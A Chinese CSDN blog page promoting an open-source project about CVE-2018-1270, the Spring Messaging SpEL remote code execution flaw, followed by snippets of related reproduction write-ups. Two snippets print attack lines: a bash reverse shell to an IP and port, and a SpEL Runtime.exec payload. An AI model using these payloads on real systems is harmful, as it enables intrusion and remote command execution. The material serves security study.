探索CaledoniaProject's CVE-2018-1270: 安全研究与学习的宝贵资源

最新推荐文章于 2024-06-28 14:49:36 发布
最新推荐文章于 2024-06-28 14:49:36 发布
阅读量288 收藏 6
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00074/article/details/137193554
版权

探索CaledoniaProject's CVE-2018-1270: 安全研究与学习的宝贵资源

项目简介

是由CaledoniaProject维护的一个开源项目,主要关注的是2018年发现的安全漏洞。这个项目为开发者和安全研究人员提供了一个深入理解、学习和研究已知安全漏洞的实际案例的机会。

技术分析

此项目包含对CVE-2018-1270漏洞的详细描述,包括它是如何被利用的,影响的软件或系统组件,以及修复方法。通过阅读源代码和相关文档,你可以了解到:

  1. 漏洞类型:CVE-2018-1270是一个典型的注入攻击,通常由于不当的数据验证和处理导致。
  2. 影响范围:它可能影响使用特定库或服务的多个应用程序,暴露敏感信息或者允许恶意执行代码。
  3. 漏洞机制:项目揭示了攻击者如何构造恶意输入以绕过安全性检查并触发漏洞。
  4. 防范措施:提供了安全编码的最佳实践和补丁应用的示例,帮助开发人员避免类似问题。

应用场景

对于任何从事软件开发、网络安全或热衷于逆向工程的人而言,此项目都有极大的价值:

  1. 学习安全编程:新手开发者可以通过分析这个实例,了解如何避免常见的安全陷阱。
  2. 安全审计:专业的安全工程师可以对照这个案例进行代码审计,提升安全防护能力。
  3. 教育与培训:教师和培训机构可以用这个项目作为实例,教授学生如何识别和修复安全漏洞。
  4. 研究参考:学术界的研究人员可以从中获取一手数据,进一步探索漏洞产生和利用的模式。

特点

这个项目的显著特点包括:

  1. 实践性:实际的漏洞案例,让理论知识更具实践意义。
  2. 详尽文档:丰富的说明和解释,使学习过程更加流畅。
  3. 开放源码:任何人都可以查看、学习、甚至贡献自己的理解和解决方案。
  4. 持续更新:随着新发现和修复方案的出现,项目会定期更新。

结论

CaledoniaProject的CVE-2018-1270项目不仅是一个深入理解安全漏洞的好起点,而且是一个强化你安全实践技能的强大工具。无论是初学者还是资深专家,都能从中受益。访问,开始你的安全之旅吧!

戴艺音
关注
[JAVA安全]Spring Messaging之CVE-2018-1270
snowlyzz的博客
02-19 905
SpEL注入漏洞
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
mole_exp的博客
02-26 8365
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
网络黑客们“最爱”的10大系统安全缺陷
最新发布
XRY_XIAO的博客
06-28 641
网络黑客们“最爱”的10大系统安全缺陷
Spring RCE漏洞分析1(CVE-2018-1270
hldfight
05-04 8262
0x00 前言 趁着五一休息,分析了一下Spring的历史漏洞,这里记录一下对Spring-Messaging远程代码执行漏洞(CVE-2018-1270)的分析。该漏洞涉及到如下概念: 1、WebSocket协议,是HTML5提供的一种可在单个TCP连接上进行全双工通讯的协议。即允许服务端主动向客户端推送数据,详情可以参考这里,讲的挺好的。 2、SockJS,一个JavaScript库,它在浏览...
Spring Messaging远程命令执行漏洞复现(CVE-2018-1270
wutiangui的博客
09-10 464
Spring Messaging为Spring框架提供消息支持,用户使用受影响版本的Spring Framework时,允许应用程序通过Spring Messaging模块内存中STOMP代理创建WebSocket。由于selector用SpEL表达式编写,并使用StandardEvaluationContext解析(权限太大),进而导致远程执行代码攻击。访问:http://192.168.25.128:8080/gs-guide-websocket。1.准备shell命令。
Spring Messaging 远程命令执行漏洞(CVE-2018-1270
EC_Carrot的博客
08-04 646
漏洞简介 Pivotal Spring Framework是美国Pivotal Software公司的一套开源的Java、Java EE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Pivotal Spring Framework 5.0.5之前的5.0版本、4.3.15之前的4.3版本和不再支持的老版本中存在安全漏洞。远程攻击者可通过构造消息利用该漏洞执行任意代码。 漏洞复现 我使用的是vulhub的环境,环境内自带exploit.py,该poc需要修改参数且不具有通用性,当然在vulhub的环境
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
cve-2018-2894:cve-2018-2894 不同别人的利用方法
04-29
Weblogic任意文件上传漏洞(CVE-2018-2894) 最近大家都在说这个漏洞,大家都注意到config.do这里发生了问题,但是其实根据 这里的信息,begin.do也是有问题。少扯淡,下面给出具体利用方法: 问题就出现下下面这个...
CVE-2018-8120:CVE-2018-8120 Windows LPE攻击
05-16
CVE-2018-8120 CVE-2018-8120 Windows LPE攻击 同时支持x32和x64。 经过测试:Win7 x32,Win7 x64,Win2008 x32,Win2008 R2 x32,Win2008 R2 Datacenter x64,Win2008 Enterprise x64。 用法 CVE-2018-8120 ...
spring-framework-5.0.5.RELEASE 漏洞修复
04-11
漏洞详情: spring-messaging模块远程代码执行(CVE-2018-1270) STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它允许STOMP客户端与任意STOMP消息代理(Broker)进行交互。Spring框架中的spring-messaging模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,因此攻击者可以通过构造恶意的消息来实现远程代码执行。 Windows平台Spring MVC框架目录遍历(CVE-2018-1271) Spring MVC框架支持配置静态资源文件(例如CSS、JS、图片等)访问,当静态文件存储在Windows平台的文件系统时,攻击者可以通过构造一个恶意的URL来实现目录遍历攻击。 Spring框架Multipart内容污染(CVE-2018-1272) 当使用Spring MVC或Spring WebFlux框架的应用收到一个客户端请求,并用它来向另一个服务端发送multipart请求时,攻击者可利用该漏洞往里插入恶意内容。该漏洞的利用有一定的限制,要求攻击者能够猜到multipart字段的boundary值,因此影响较低。
CVE-2018-2628:CVE-2018-2628和CVE-2018-2893
04-30
CVE-2018-2628 简单解读: ://mp.weixin.qq.com/s __biz MzU0NzYzMzU0Mw== mid 2247483673 idx sn 45360b4ed1c95947088121b28cb1e45e chksm fb4a21f1cc3da8e748b3ac677c7c7c 或 这个PoC也可以用来测试CVE-2018-...
CVE-2018-1270-Spring Messaging RCE漏洞复现
m0_58596609的博客
04-22 5854
CVE-2018-1270-Spring Messaging RCE漏洞复现
复现CVE-2018-1270——Spring Messaging 远程命令执行漏洞
记录并分享学习安全的知识点..
01-17 774
一、漏洞概述 spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 二、漏洞复现 发现页面如下: exp如下: x.x.x.x/gs-guide-websocket 我是用dnslog验证的: 用我的方法poc如..
CVE-2018-1270CVE-2018-1273:Spring Expression Language 漏洞分析
qq_22655689的博客
04-12 1459
0x00 背景     最近Spring框架不大太平,接连爆出来多个RCE远程代码执行的CVE漏洞,其中有CVE-2018-1270CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。   0x01 漏洞影响 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起...
记一次曲折的CVE-2018-1270复现分析
蚁景网安学院
04-02 2683
前两天接到朋友对某个授权目标的漏扫结果,也算是初次接触到这个漏洞,就想着顺手分析一下复现一下,因为分析这个漏洞的文章也比较少,所以刚开始比较迷,进度也比较慢。
【vulhub】Spring Messaging 远程命令执行漏洞(CVE-2018-1270)漏洞验证与getshell
qq_45300786的博客
08-01 782
利用条件 影响范围 Spring Framework 5.0 to 5.0.4. Spring Framework 4.3 to 4.3.14 已不支持的旧版本仍然受影响 详细过程请看 Spring Messaging 远程命令执行漏洞(CVE-2018-1270) 对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符) bash -i >& /dev/tcp/192.168.100.23/9090 0>&a
Spring Messaging 远程命令执行漏洞(CVE-2018-1270)——漏洞复现
weixin_42090431的博客
11-28 242
2. 用[sockjs协议](https://github.com/sockjs/sockjs-client)发送文本流,sockjs会选择一个合适的通道:websocket或xhr(http),与后端通信。在vulhub中,我们向`/app/hello`发送一个包含name的json,即可触发这个事件。2. 待执行的SpEL表达式,如`T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')`根据你自己的需求修改POC。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戴艺音

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值